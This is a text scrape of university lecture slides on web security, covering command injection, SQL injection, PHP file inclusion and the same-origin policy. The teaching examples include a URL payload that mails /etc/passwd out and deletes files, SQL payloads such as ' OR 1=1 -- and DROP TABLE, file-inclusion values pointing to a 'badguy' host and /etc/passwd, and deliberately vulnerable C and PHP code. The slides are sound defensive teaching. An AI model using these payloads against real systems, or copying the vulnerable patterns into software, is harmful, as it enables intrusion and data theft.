web security, part 1dszajda/classes/... · • friday’s lecture: buffer overflow attacks – read...
TRANSCRIPT
![Page 1: Web Security, Part 1dszajda/classes/... · • Friday’s lecture: Buffer Overflow attacks – Read P&P 3.0, 3.1, 3.2 • Follow the newsgroup • If you are also enrolled in CS160](https://reader035.vdocuments.us/reader035/viewer/2022071016/5fcfd8eee373fe2bb74b03eb/html5/thumbnails/1.jpg)
Web Security, Part 1 (as usual, thanks to Dave Wagner and
Vern Paxson)
![Page 2: Web Security, Part 1dszajda/classes/... · • Friday’s lecture: Buffer Overflow attacks – Read P&P 3.0, 3.1, 3.2 • Follow the newsgroup • If you are also enrolled in CS160](https://reader035.vdocuments.us/reader035/viewer/2022071016/5fcfd8eee373fe2bb74b03eb/html5/thumbnails/2.jpg)
Web Server Threats
• What can happen? – Compromise – Defacement – Gateway to attacking clients – Disclosure – (not mutually exclusive)
• And what makes the problem particularly tricky? – Public access – Mission creep
![Page 3: Web Security, Part 1dszajda/classes/... · • Friday’s lecture: Buffer Overflow attacks – Read P&P 3.0, 3.1, 3.2 • Follow the newsgroup • If you are also enrolled in CS160](https://reader035.vdocuments.us/reader035/viewer/2022071016/5fcfd8eee373fe2bb74b03eb/html5/thumbnails/3.jpg)
![Page 4: Web Security, Part 1dszajda/classes/... · • Friday’s lecture: Buffer Overflow attacks – Read P&P 3.0, 3.1, 3.2 • Follow the newsgroup • If you are also enrolled in CS160](https://reader035.vdocuments.us/reader035/viewer/2022071016/5fcfd8eee373fe2bb74b03eb/html5/thumbnails/4.jpg)
![Page 5: Web Security, Part 1dszajda/classes/... · • Friday’s lecture: Buffer Overflow attacks – Read P&P 3.0, 3.1, 3.2 • Follow the newsgroup • If you are also enrolled in CS160](https://reader035.vdocuments.us/reader035/viewer/2022071016/5fcfd8eee373fe2bb74b03eb/html5/thumbnails/5.jpg)
![Page 6: Web Security, Part 1dszajda/classes/... · • Friday’s lecture: Buffer Overflow attacks – Read P&P 3.0, 3.1, 3.2 • Follow the newsgroup • If you are also enrolled in CS160](https://reader035.vdocuments.us/reader035/viewer/2022071016/5fcfd8eee373fe2bb74b03eb/html5/thumbnails/6.jpg)
![Page 7: Web Security, Part 1dszajda/classes/... · • Friday’s lecture: Buffer Overflow attacks – Read P&P 3.0, 3.1, 3.2 • Follow the newsgroup • If you are also enrolled in CS160](https://reader035.vdocuments.us/reader035/viewer/2022071016/5fcfd8eee373fe2bb74b03eb/html5/thumbnails/7.jpg)
![Page 8: Web Security, Part 1dszajda/classes/... · • Friday’s lecture: Buffer Overflow attacks – Read P&P 3.0, 3.1, 3.2 • Follow the newsgroup • If you are also enrolled in CS160](https://reader035.vdocuments.us/reader035/viewer/2022071016/5fcfd8eee373fe2bb74b03eb/html5/thumbnails/8.jpg)
![Page 9: Web Security, Part 1dszajda/classes/... · • Friday’s lecture: Buffer Overflow attacks – Read P&P 3.0, 3.1, 3.2 • Follow the newsgroup • If you are also enrolled in CS160](https://reader035.vdocuments.us/reader035/viewer/2022071016/5fcfd8eee373fe2bb74b03eb/html5/thumbnails/9.jpg)
![Page 10: Web Security, Part 1dszajda/classes/... · • Friday’s lecture: Buffer Overflow attacks – Read P&P 3.0, 3.1, 3.2 • Follow the newsgroup • If you are also enrolled in CS160](https://reader035.vdocuments.us/reader035/viewer/2022071016/5fcfd8eee373fe2bb74b03eb/html5/thumbnails/10.jpg)
![Page 11: Web Security, Part 1dszajda/classes/... · • Friday’s lecture: Buffer Overflow attacks – Read P&P 3.0, 3.1, 3.2 • Follow the newsgroup • If you are also enrolled in CS160](https://reader035.vdocuments.us/reader035/viewer/2022071016/5fcfd8eee373fe2bb74b03eb/html5/thumbnails/11.jpg)
![Page 12: Web Security, Part 1dszajda/classes/... · • Friday’s lecture: Buffer Overflow attacks – Read P&P 3.0, 3.1, 3.2 • Follow the newsgroup • If you are also enrolled in CS160](https://reader035.vdocuments.us/reader035/viewer/2022071016/5fcfd8eee373fe2bb74b03eb/html5/thumbnails/12.jpg)
![Page 13: Web Security, Part 1dszajda/classes/... · • Friday’s lecture: Buffer Overflow attacks – Read P&P 3.0, 3.1, 3.2 • Follow the newsgroup • If you are also enrolled in CS160](https://reader035.vdocuments.us/reader035/viewer/2022071016/5fcfd8eee373fe2bb74b03eb/html5/thumbnails/13.jpg)
![Page 14: Web Security, Part 1dszajda/classes/... · • Friday’s lecture: Buffer Overflow attacks – Read P&P 3.0, 3.1, 3.2 • Follow the newsgroup • If you are also enrolled in CS160](https://reader035.vdocuments.us/reader035/viewer/2022071016/5fcfd8eee373fe2bb74b03eb/html5/thumbnails/14.jpg)
![Page 15: Web Security, Part 1dszajda/classes/... · • Friday’s lecture: Buffer Overflow attacks – Read P&P 3.0, 3.1, 3.2 • Follow the newsgroup • If you are also enrolled in CS160](https://reader035.vdocuments.us/reader035/viewer/2022071016/5fcfd8eee373fe2bb74b03eb/html5/thumbnails/15.jpg)
![Page 16: Web Security, Part 1dszajda/classes/... · • Friday’s lecture: Buffer Overflow attacks – Read P&P 3.0, 3.1, 3.2 • Follow the newsgroup • If you are also enrolled in CS160](https://reader035.vdocuments.us/reader035/viewer/2022071016/5fcfd8eee373fe2bb74b03eb/html5/thumbnails/16.jpg)
16
Attacking Via HTTP " URLs: Global identifiers of network-retrievable resources
http://user:[email protected]:81/class?name=cs161#homework
Protocol
Username
Password
Host Port Path Query
Fragment
![Page 17: Web Security, Part 1dszajda/classes/... · • Friday’s lecture: Buffer Overflow attacks – Read P&P 3.0, 3.1, 3.2 • Follow the newsgroup • If you are also enrolled in CS160](https://reader035.vdocuments.us/reader035/viewer/2022071016/5fcfd8eee373fe2bb74b03eb/html5/thumbnails/17.jpg)
Simple Service Example
• Allow users to search the local phonebook for any entries that match a regular expression
• Invoked via URL like: http://harmless.com/phonebook.cgi?regex=<pattern>
• So for example: http://harmless.com/phonebook.cgi?regex=daw|vern
searches phonebook for any entries with “daw” or “vern” in them
• (Note: web surfer doesn’t enter this URL themselves; an HTML form constructs it from what they type)
![Page 18: Web Security, Part 1dszajda/classes/... · • Friday’s lecture: Buffer Overflow attacks – Read P&P 3.0, 3.1, 3.2 • Follow the newsgroup • If you are also enrolled in CS160](https://reader035.vdocuments.us/reader035/viewer/2022071016/5fcfd8eee373fe2bb74b03eb/html5/thumbnails/18.jpg)
Simple Service Example, con’t • Assume our server has some “glue” that parses URLs to
extract parameters into C variables – and returns stdout to the user
• Simple version of code to implement search:
/* print any employees whose name * matches the given regex */ void find_employee(char *regex) { char cmd[512]; sprintf(cmd, "grep %s phonebook.txt", regex); system(cmd); }
![Page 19: Web Security, Part 1dszajda/classes/... · • Friday’s lecture: Buffer Overflow attacks – Read P&P 3.0, 3.1, 3.2 • Follow the newsgroup • If you are also enrolled in CS160](https://reader035.vdocuments.us/reader035/viewer/2022071016/5fcfd8eee373fe2bb74b03eb/html5/thumbnails/19.jpg)
Simple Service Example, con’t • Assume our server has some “glue” that parses URLs to
extract parameters into C variables – and returns stdout to the user
• Simple version of code to implement search:
/* print any employees whose name * matches the given regex */ void find_employee(char *regex) { char cmd[512]; snprintf(cmd, sizeof cmd, "grep %s phonebook.txt", regex); system(cmd); } Are we done?
![Page 20: Web Security, Part 1dszajda/classes/... · • Friday’s lecture: Buffer Overflow attacks – Read P&P 3.0, 3.1, 3.2 • Follow the newsgroup • If you are also enrolled in CS160](https://reader035.vdocuments.us/reader035/viewer/2022071016/5fcfd8eee373fe2bb74b03eb/html5/thumbnails/20.jpg)
A Digression into Breakfast Cereals
• 2600 Hz tone a form of inband signaling • Beware allowing control information to
come from data • (also illustrates security-by-obscurity)
![Page 21: Web Security, Part 1dszajda/classes/... · • Friday’s lecture: Buffer Overflow attacks – Read P&P 3.0, 3.1, 3.2 • Follow the newsgroup • If you are also enrolled in CS160](https://reader035.vdocuments.us/reader035/viewer/2022071016/5fcfd8eee373fe2bb74b03eb/html5/thumbnails/21.jpg)
Instead of http://harmless.com/phonebook.cgi?regex=daw|vern
How about http://harmless.com/phonebook.cgi?regex=foo;%20mail %20-s%[email protected]%20</etc/passwd;%20rm
/* print any employees whose name * matches the given regex */ void find_employee(char *regex) { char cmd[512]; snprintf(cmd, sizeof cmd, "grep %s phonebook.txt", regex); system(cmd); }
Problems?
![Page 22: Web Security, Part 1dszajda/classes/... · • Friday’s lecture: Buffer Overflow attacks – Read P&P 3.0, 3.1, 3.2 • Follow the newsgroup • If you are also enrolled in CS160](https://reader035.vdocuments.us/reader035/viewer/2022071016/5fcfd8eee373fe2bb74b03eb/html5/thumbnails/22.jpg)
How To Fix Command Injection? snprintf(cmd, sizeof cmd, "grep ’%s’ phonebook.txt", regex);
…regex=foo’; mail -s [email protected] </etc/passwd; rm’
Okay, then scan regex and strip ’ - does that work? regex=O’Malley
Okay, then scan regex and escape ’ …. ? regex ⇒ O\’Malley (not actually quite right, but ignore that) …regex=foo\’; mail … ⇒ …regex=foo\\’; mail …
(argument to grep is “foo\”) Okay, then scan regex and escape ’ and \ …. ? …regex=foo\’; mail … ⇒ …regex=foo\\\’; mail …
(argument to grep is “foo\’; mail …”)
![Page 23: Web Security, Part 1dszajda/classes/... · • Friday’s lecture: Buffer Overflow attacks – Read P&P 3.0, 3.1, 3.2 • Follow the newsgroup • If you are also enrolled in CS160](https://reader035.vdocuments.us/reader035/viewer/2022071016/5fcfd8eee373fe2bb74b03eb/html5/thumbnails/23.jpg)
Input Sanitization
• In principle, can prevent injection attacks by properly sanitizing input – Remove inputs with meta-characters
• (can have “collateral damage” for benign inputs) – Or escape any meta-characters (including escape
characters!) • Requires a complete model of how input subsequently
processed – E.g. …regex=foo%27; mail … – E.g. …regex=foo%25%32%37; mail …
» Double-escaping bug
• And/or: avoid using a feature-rich API – KISS + defensive programming
![Page 24: Web Security, Part 1dszajda/classes/... · • Friday’s lecture: Buffer Overflow attacks – Read P&P 3.0, 3.1, 3.2 • Follow the newsgroup • If you are also enrolled in CS160](https://reader035.vdocuments.us/reader035/viewer/2022071016/5fcfd8eee373fe2bb74b03eb/html5/thumbnails/24.jpg)
/* print any employees whose name * matches the given regex */ void find_employee(char *regex) { char *path = "/usr/bin/grep"; char *argv[10];/* room for plenty of args */ char *envp[1]; /* no room since no env. */ int argc = 0;
argv[argc++] = path;/* argv[0] = prog name */ argv[argc++] = "-e";/* force regex as pat.*/ argv[argc++] = regex; argv[argc++] = "phonebook.txt"; argv[argc++] = 0; envp[0] = 0;
if ( execve(path, argv, envp) < 0 ) command_failed(.....); }
![Page 25: Web Security, Part 1dszajda/classes/... · • Friday’s lecture: Buffer Overflow attacks – Read P&P 3.0, 3.1, 3.2 • Follow the newsgroup • If you are also enrolled in CS160](https://reader035.vdocuments.us/reader035/viewer/2022071016/5fcfd8eee373fe2bb74b03eb/html5/thumbnails/25.jpg)
Command Injection in the Real World
![Page 26: Web Security, Part 1dszajda/classes/... · • Friday’s lecture: Buffer Overflow attacks – Read P&P 3.0, 3.1, 3.2 • Follow the newsgroup • If you are also enrolled in CS160](https://reader035.vdocuments.us/reader035/viewer/2022071016/5fcfd8eee373fe2bb74b03eb/html5/thumbnails/26.jpg)
Command Injection in the Real World
![Page 27: Web Security, Part 1dszajda/classes/... · • Friday’s lecture: Buffer Overflow attacks – Read P&P 3.0, 3.1, 3.2 • Follow the newsgroup • If you are also enrolled in CS160](https://reader035.vdocuments.us/reader035/viewer/2022071016/5fcfd8eee373fe2bb74b03eb/html5/thumbnails/27.jpg)
Structure of Modern Web Services
Browser Web
server
URL / Form
Web page built from database command.php?
arg1=x&arg2=y
Database server
![Page 28: Web Security, Part 1dszajda/classes/... · • Friday’s lecture: Buffer Overflow attacks – Read P&P 3.0, 3.1, 3.2 • Follow the newsgroup • If you are also enrolled in CS160](https://reader035.vdocuments.us/reader035/viewer/2022071016/5fcfd8eee373fe2bb74b03eb/html5/thumbnails/28.jpg)
PHP: Hypertext Preprocessor
• Server scripting language with C-like syntax
• Can intermingle static HTML and code <input value=<?php echo $myvalue; ?>>
• Can embed variables in double-” strings $user = “world”; echo “Hello $user!”;
Or $user = “world”; echo “Hello” . $user . “!”; • Form data in global arrays $_GET,
$_POST, …
![Page 29: Web Security, Part 1dszajda/classes/... · • Friday’s lecture: Buffer Overflow attacks – Read P&P 3.0, 3.1, 3.2 • Follow the newsgroup • If you are also enrolled in CS160](https://reader035.vdocuments.us/reader035/viewer/2022071016/5fcfd8eee373fe2bb74b03eb/html5/thumbnails/29.jpg)
SQL
• Widely used database query language • Fetch a set of records
SELECT * FROM Person WHERE Username=‘oski’
• Add data to the table INSERT INTO Person (Username, Balance) VALUES (‘oski’, 10)
• Modify data UPDATE Person SET Balance=42 WHERE Username=‘oski’
• Query syntax (mostly) independent of vendor
![Page 30: Web Security, Part 1dszajda/classes/... · • Friday’s lecture: Buffer Overflow attacks – Read P&P 3.0, 3.1, 3.2 • Follow the newsgroup • If you are also enrolled in CS160](https://reader035.vdocuments.us/reader035/viewer/2022071016/5fcfd8eee373fe2bb74b03eb/html5/thumbnails/30.jpg)
SQL Injection Scenario
• Sample PHP $recipient = $_POST[‘recipient’]; $sql = "SELECT PersonID FROM Person WHERE Balance < 100 AND Username='$recipient' "; $rs = $db->executeQuery($sql);
• How can recipient cause trouble here? – How can we see anyone’s balance?
![Page 31: Web Security, Part 1dszajda/classes/... · • Friday’s lecture: Buffer Overflow attacks – Read P&P 3.0, 3.1, 3.2 • Follow the newsgroup • If you are also enrolled in CS160](https://reader035.vdocuments.us/reader035/viewer/2022071016/5fcfd8eee373fe2bb74b03eb/html5/thumbnails/31.jpg)
SQL Injection Scenario, con’t
WHERE Balance < 100 AND Username='$recipient' ";
• recipient = foo' OR 1=1 -- (“--” is a comment, it masks the lack of close ‘)
• Or foo'; DROP TABLE Person; -- ?
• Or … change database however you wish
![Page 32: Web Security, Part 1dszajda/classes/... · • Friday’s lecture: Buffer Overflow attacks – Read P&P 3.0, 3.1, 3.2 • Follow the newsgroup • If you are also enrolled in CS160](https://reader035.vdocuments.us/reader035/viewer/2022071016/5fcfd8eee373fe2bb74b03eb/html5/thumbnails/32.jpg)
Victim Server
Victim SQL DB
Attacker
post malicious form
unintended query
receive valuable data
1
2
3
SQL Injection: Retrieving Data
![Page 33: Web Security, Part 1dszajda/classes/... · • Friday’s lecture: Buffer Overflow attacks – Read P&P 3.0, 3.1, 3.2 • Follow the newsgroup • If you are also enrolled in CS160](https://reader035.vdocuments.us/reader035/viewer/2022071016/5fcfd8eee373fe2bb74b03eb/html5/thumbnails/33.jpg)
Victim Server
Victim SQL DB
Attacker
post malicious form
unintended command
Database modified
1
2
3
SQL Injection: Modifying Data
![Page 34: Web Security, Part 1dszajda/classes/... · • Friday’s lecture: Buffer Overflow attacks – Read P&P 3.0, 3.1, 3.2 • Follow the newsgroup • If you are also enrolled in CS160](https://reader035.vdocuments.us/reader035/viewer/2022071016/5fcfd8eee373fe2bb74b03eb/html5/thumbnails/34.jpg)
Defenses (work-in-progress)
Character-level taint tracking: Check that keywords, metachars are untainted.
Secure template languages: Template languages should automatically quote or encode substitutions appropriately.
SELECT u FROM t WHERE n='Bobby'
SELECT u FROM t WHERE n='Bobby' OR 1=1 --'
<P>Hello ${username}! Welcome back.
Defenses (work in progress)
![Page 35: Web Security, Part 1dszajda/classes/... · • Friday’s lecture: Buffer Overflow attacks – Read P&P 3.0, 3.1, 3.2 • Follow the newsgroup • If you are also enrolled in CS160](https://reader035.vdocuments.us/reader035/viewer/2022071016/5fcfd8eee373fe2bb74b03eb/html5/thumbnails/35.jpg)
1. Form displayed in user’s browser
2. PHP code executed by server
Injection via file inclusion
3. Now suppose COLOR=http://badguy/evil Or: COLOR=../../../etc/passwd%00
![Page 36: Web Security, Part 1dszajda/classes/... · • Friday’s lecture: Buffer Overflow attacks – Read P&P 3.0, 3.1, 3.2 • Follow the newsgroup • If you are also enrolled in CS160](https://reader035.vdocuments.us/reader035/viewer/2022071016/5fcfd8eee373fe2bb74b03eb/html5/thumbnails/36.jpg)
Questions?
![Page 37: Web Security, Part 1dszajda/classes/... · • Friday’s lecture: Buffer Overflow attacks – Read P&P 3.0, 3.1, 3.2 • Follow the newsgroup • If you are also enrolled in CS160](https://reader035.vdocuments.us/reader035/viewer/2022071016/5fcfd8eee373fe2bb74b03eb/html5/thumbnails/37.jpg)
![Page 38: Web Security, Part 1dszajda/classes/... · • Friday’s lecture: Buffer Overflow attacks – Read P&P 3.0, 3.1, 3.2 • Follow the newsgroup • If you are also enrolled in CS160](https://reader035.vdocuments.us/reader035/viewer/2022071016/5fcfd8eee373fe2bb74b03eb/html5/thumbnails/38.jpg)
![Page 39: Web Security, Part 1dszajda/classes/... · • Friday’s lecture: Buffer Overflow attacks – Read P&P 3.0, 3.1, 3.2 • Follow the newsgroup • If you are also enrolled in CS160](https://reader035.vdocuments.us/reader035/viewer/2022071016/5fcfd8eee373fe2bb74b03eb/html5/thumbnails/39.jpg)
![Page 40: Web Security, Part 1dszajda/classes/... · • Friday’s lecture: Buffer Overflow attacks – Read P&P 3.0, 3.1, 3.2 • Follow the newsgroup • If you are also enrolled in CS160](https://reader035.vdocuments.us/reader035/viewer/2022071016/5fcfd8eee373fe2bb74b03eb/html5/thumbnails/40.jpg)
![Page 41: Web Security, Part 1dszajda/classes/... · • Friday’s lecture: Buffer Overflow attacks – Read P&P 3.0, 3.1, 3.2 • Follow the newsgroup • If you are also enrolled in CS160](https://reader035.vdocuments.us/reader035/viewer/2022071016/5fcfd8eee373fe2bb74b03eb/html5/thumbnails/41.jpg)
![Page 42: Web Security, Part 1dszajda/classes/... · • Friday’s lecture: Buffer Overflow attacks – Read P&P 3.0, 3.1, 3.2 • Follow the newsgroup • If you are also enrolled in CS160](https://reader035.vdocuments.us/reader035/viewer/2022071016/5fcfd8eee373fe2bb74b03eb/html5/thumbnails/42.jpg)
![Page 43: Web Security, Part 1dszajda/classes/... · • Friday’s lecture: Buffer Overflow attacks – Read P&P 3.0, 3.1, 3.2 • Follow the newsgroup • If you are also enrolled in CS160](https://reader035.vdocuments.us/reader035/viewer/2022071016/5fcfd8eee373fe2bb74b03eb/html5/thumbnails/43.jpg)
![Page 44: Web Security, Part 1dszajda/classes/... · • Friday’s lecture: Buffer Overflow attacks – Read P&P 3.0, 3.1, 3.2 • Follow the newsgroup • If you are also enrolled in CS160](https://reader035.vdocuments.us/reader035/viewer/2022071016/5fcfd8eee373fe2bb74b03eb/html5/thumbnails/44.jpg)
![Page 45: Web Security, Part 1dszajda/classes/... · • Friday’s lecture: Buffer Overflow attacks – Read P&P 3.0, 3.1, 3.2 • Follow the newsgroup • If you are also enrolled in CS160](https://reader035.vdocuments.us/reader035/viewer/2022071016/5fcfd8eee373fe2bb74b03eb/html5/thumbnails/45.jpg)
![Page 46: Web Security, Part 1dszajda/classes/... · • Friday’s lecture: Buffer Overflow attacks – Read P&P 3.0, 3.1, 3.2 • Follow the newsgroup • If you are also enrolled in CS160](https://reader035.vdocuments.us/reader035/viewer/2022071016/5fcfd8eee373fe2bb74b03eb/html5/thumbnails/46.jpg)
![Page 47: Web Security, Part 1dszajda/classes/... · • Friday’s lecture: Buffer Overflow attacks – Read P&P 3.0, 3.1, 3.2 • Follow the newsgroup • If you are also enrolled in CS160](https://reader035.vdocuments.us/reader035/viewer/2022071016/5fcfd8eee373fe2bb74b03eb/html5/thumbnails/47.jpg)
Coming Up …
• Friday’s lecture: Buffer Overflow attacks – Read P&P 3.0, 3.1, 3.2
• Follow the newsgroup • If you are also enrolled in CS160 or CS164 and
need to take the final at the alternate time, sign up via the web
• Due Thu Jan 28 (11:59PM): – Get your class account set up – Use it to submit a writeup that you have read the
class web page, including (especially) policies on collaboration, Academic Dishonesty, and ethics/legality
![Page 48: Web Security, Part 1dszajda/classes/... · • Friday’s lecture: Buffer Overflow attacks – Read P&P 3.0, 3.1, 3.2 • Follow the newsgroup • If you are also enrolled in CS160](https://reader035.vdocuments.us/reader035/viewer/2022071016/5fcfd8eee373fe2bb74b03eb/html5/thumbnails/48.jpg)
Safe to type your password?
48
![Page 49: Web Security, Part 1dszajda/classes/... · • Friday’s lecture: Buffer Overflow attacks – Read P&P 3.0, 3.1, 3.2 • Follow the newsgroup • If you are also enrolled in CS160](https://reader035.vdocuments.us/reader035/viewer/2022071016/5fcfd8eee373fe2bb74b03eb/html5/thumbnails/49.jpg)
Safe to type your password?
49
![Page 50: Web Security, Part 1dszajda/classes/... · • Friday’s lecture: Buffer Overflow attacks – Read P&P 3.0, 3.1, 3.2 • Follow the newsgroup • If you are also enrolled in CS160](https://reader035.vdocuments.us/reader035/viewer/2022071016/5fcfd8eee373fe2bb74b03eb/html5/thumbnails/50.jpg)
Safe to type your password?
50
![Page 51: Web Security, Part 1dszajda/classes/... · • Friday’s lecture: Buffer Overflow attacks – Read P&P 3.0, 3.1, 3.2 • Follow the newsgroup • If you are also enrolled in CS160](https://reader035.vdocuments.us/reader035/viewer/2022071016/5fcfd8eee373fe2bb74b03eb/html5/thumbnails/51.jpg)
Safe to type your password?
51
???
???
![Page 52: Web Security, Part 1dszajda/classes/... · • Friday’s lecture: Buffer Overflow attacks – Read P&P 3.0, 3.1, 3.2 • Follow the newsgroup • If you are also enrolled in CS160](https://reader035.vdocuments.us/reader035/viewer/2022071016/5fcfd8eee373fe2bb74b03eb/html5/thumbnails/52.jpg)
Safe to type your password?
52
![Page 53: Web Security, Part 1dszajda/classes/... · • Friday’s lecture: Buffer Overflow attacks – Read P&P 3.0, 3.1, 3.2 • Follow the newsgroup • If you are also enrolled in CS160](https://reader035.vdocuments.us/reader035/viewer/2022071016/5fcfd8eee373fe2bb74b03eb/html5/thumbnails/53.jpg)
53
Same-Origin Policy
How does the browser isolate different sites?
![Page 54: Web Security, Part 1dszajda/classes/... · • Friday’s lecture: Buffer Overflow attacks – Read P&P 3.0, 3.1, 3.2 • Follow the newsgroup • If you are also enrolled in CS160](https://reader035.vdocuments.us/reader035/viewer/2022071016/5fcfd8eee373fe2bb74b03eb/html5/thumbnails/54.jpg)
Windows Interact
54
![Page 55: Web Security, Part 1dszajda/classes/... · • Friday’s lecture: Buffer Overflow attacks – Read P&P 3.0, 3.1, 3.2 • Follow the newsgroup • If you are also enrolled in CS160](https://reader035.vdocuments.us/reader035/viewer/2022071016/5fcfd8eee373fe2bb74b03eb/html5/thumbnails/55.jpg)
Are all interactions good?
55
![Page 56: Web Security, Part 1dszajda/classes/... · • Friday’s lecture: Buffer Overflow attacks – Read P&P 3.0, 3.1, 3.2 • Follow the newsgroup • If you are also enrolled in CS160](https://reader035.vdocuments.us/reader035/viewer/2022071016/5fcfd8eee373fe2bb74b03eb/html5/thumbnails/56.jpg)
56
" Different origins have limited interaction
" Origin is the tuple <domain, port, protocol> http://www.example.com:80/whoami
http://www.example.com:80/hello
https://www.example.com:443/hello http://www.example.com:443/hello
Browser Same-Origin Policy
Full access
Limited access
![Page 57: Web Security, Part 1dszajda/classes/... · • Friday’s lecture: Buffer Overflow attacks – Read P&P 3.0, 3.1, 3.2 • Follow the newsgroup • If you are also enrolled in CS160](https://reader035.vdocuments.us/reader035/viewer/2022071016/5fcfd8eee373fe2bb74b03eb/html5/thumbnails/57.jpg)
Same-Origin Policy Examples
" Example HTML at http://www.site.com/ <iframe src="http://othersite.com/"></iframe> <img src="http://othersite.com/logo.gif">
" Disallowed: alert(frames[0].document.body.innerHTML) alert(frames[0].location)
" Allowed: alert(images[0].height) frames[0].location = "http://othersite.com/foo";
57
![Page 58: Web Security, Part 1dszajda/classes/... · • Friday’s lecture: Buffer Overflow attacks – Read P&P 3.0, 3.1, 3.2 • Follow the newsgroup • If you are also enrolled in CS160](https://reader035.vdocuments.us/reader035/viewer/2022071016/5fcfd8eee373fe2bb74b03eb/html5/thumbnails/58.jpg)
58
58
Mixed Content
![Page 59: Web Security, Part 1dszajda/classes/... · • Friday’s lecture: Buffer Overflow attacks – Read P&P 3.0, 3.1, 3.2 • Follow the newsgroup • If you are also enrolled in CS160](https://reader035.vdocuments.us/reader035/viewer/2022071016/5fcfd8eee373fe2bb74b03eb/html5/thumbnails/59.jpg)
59
A Guninski Attack
awglogin
window.open("https://attacker.com/", "awglogin");
![Page 60: Web Security, Part 1dszajda/classes/... · • Friday’s lecture: Buffer Overflow attacks – Read P&P 3.0, 3.1, 3.2 • Follow the newsgroup • If you are also enrolled in CS160](https://reader035.vdocuments.us/reader035/viewer/2022071016/5fcfd8eee373fe2bb74b03eb/html5/thumbnails/60.jpg)
What should the policy be?
60
Child
Sibling
Descendant
Frame Bust
![Page 61: Web Security, Part 1dszajda/classes/... · • Friday’s lecture: Buffer Overflow attacks – Read P&P 3.0, 3.1, 3.2 • Follow the newsgroup • If you are also enrolled in CS160](https://reader035.vdocuments.us/reader035/viewer/2022071016/5fcfd8eee373fe2bb74b03eb/html5/thumbnails/61.jpg)
Building up Web Pages from SQL
<?php $result = mysql_query( "SELECT * from users where username=" . $_POST['username'] . " AND password=" . $_POST['password']); $row = mysql_fetch_array($result) .... ?> <html><body> Welcome <?php print $row['username'] ?> </body></html>